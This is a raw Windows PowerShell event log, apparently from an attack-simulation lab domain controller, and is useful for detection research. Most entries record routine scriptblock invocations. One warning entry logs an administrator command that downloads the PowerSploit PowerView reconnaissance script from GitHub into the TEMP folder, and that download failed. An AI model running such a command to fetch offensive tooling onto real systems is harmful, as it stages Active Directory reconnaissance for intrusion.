{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: 6e0bf2cf-03bf-4e0d-889a-d1518cc0f912
Path:
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478252
Keywords=None
Message=Started invocation of ScriptBlock ID: 0c071910-2763-43bf-9f6c-a573d277710a
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478251
Keywords=None
Message=Started invocation of ScriptBlock ID: 6300a935-393c-479f-9cf0-a0095a8370ac
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478250
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 6300a935-393c-479f-9cf0-a0095a8370ac
Path:
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478249
Keywords=None
Message=Started invocation of ScriptBlock ID: becad337-3722-4436-9010-d0181cf2afcd
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478248
Keywords=None
Message=Completed invocation of ScriptBlock ID: 882e6e1c-bc14-4b79-be55-5c6ddce3741e
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478247
Keywords=None
Message=Started invocation of ScriptBlock ID: 882e6e1c-bc14-4b79-be55-5c6ddce3741e
Runspace ID: 28137c09-3484-42fe-8458-ca9fd0ddf20c
06/15/2021 05:06:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4100
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when an exception is raised
RecordNumber=1478246
Keywords=None
Message=Error Message = The request was aborted: Could not create SSL/TLS secure channel.
Fully Qualified Error ID = WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand


Context:
        Severity = Warning
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = c3ed4fff-3f58-4a9c-9771-1818a5dfdf46
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe & {Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"}
        Engine Version = 5.1.14393.4402
        Runspace ID = 28137c09-3484-42fe-8458-ca9fd0ddf20c
        Pipeline ID = 1
        Command Name = Invoke-WebRequest
        Command Type = Cmdlet
        Script Name = 
        Command Path = 
        Sequence Number = 15
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478468
Keywords=None
Message=Started invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478467
Keywords=None
Message=Completed invocation of ScriptBlock ID: 29c2e87f-d893-446d-9fe4-e07bf489d300
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478466
Keywords=None
Message=Completed invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478465
Keywords=None
Message=Started invocation of ScriptBlock ID: 96c9fa28-5752-4028-87a6-893baac490be
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478464
Keywords=None
Message=Started invocation of ScriptBlock ID: 29c2e87f-d893-446d-9fe4-e07bf489d300
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478463
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 29c2e87f-d893-446d-9fe4-e07bf489d300
Path:
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478462
Keywords=None
Message=Completed invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478461
Keywords=None
Message=Started invocation of ScriptBlock ID: ca06aa1b-177a-4689-9498-1195c0905ec9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478460
Keywords=None
Message=Completed invocation of ScriptBlock ID: 72eddf12-5b9d-4006-a18f-22f4fda72008
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478459
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478458
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478457
Keywords=None
Message=Completed invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478456
Keywords=None
Message=Started invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478455
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478454
Keywords=None
Message=Started invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478453
Keywords=None
Message=Completed invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478452
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478451
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478450
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478449
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478448
Keywords=None
Message=Started invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478447
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478446
Keywords=None
Message=Completed invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478445
Keywords=None
Message=Started invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478444
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478443
Keywords=None
Message=Completed invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478442
Keywords=None
Message=Started invocation of ScriptBlock ID: 378d3c9c-7e66-4752-aa62-9136843a5efd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478441
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478440
Keywords=None
Message=Started invocation of ScriptBlock ID: 3e25f239-fa3d-49da-8dce-f103d67bd1b5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478439
Keywords=None
Message=Completed invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478438
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478437
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478436
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478435
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478434
Keywords=None
Message=Started invocation of ScriptBlock ID: d9432ec7-1113-4c2e-8d79-d8f910249f08
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478433
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ccf8614-5388-4599-8b4a-25a5522f098f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478432
Keywords=None
Message=Completed invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478431
Keywords=None
Message=Started invocation of ScriptBlock ID: 892cd5a7-1ed1-45c5-b2dd-9883bf181058
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478430
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478429
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478428
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478427
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3c5bb87d-08bd-4440-b210-b4cc8d4e6dc3
Runspace ID: 8cda7be1-22da-4435-a072-9b50e2842368
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478426
Keywords=None
Message=Completed invocation of ScriptBlock ID: f3afa0b4-27b1-4ed8-a9bf-0407783065fd
Runspace ID: 8cda7be1-22da-4435-a072-9b50e2842368
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478425
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2b670f81-ef54-4ee2-b41b-eb387ffa7643
Runspace ID: 8cda7be1-22da-4435-a072-9b50e2842368
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478424
Keywords=None
Message=Started invocation of ScriptBlock ID: 2b670f81-ef54-4ee2-b41b-eb387ffa7643
Runspace ID: 8cda7be1-22da-4435-a072-9b50e2842368
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478423
Keywords=None
Message=Started invocation of ScriptBlock ID: f3afa0b4-27b1-4ed8-a9bf-0407783065fd
Runspace ID: 8cda7be1-22da-4435-a072-9b50e2842368
06/15/2021 05:06:06 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
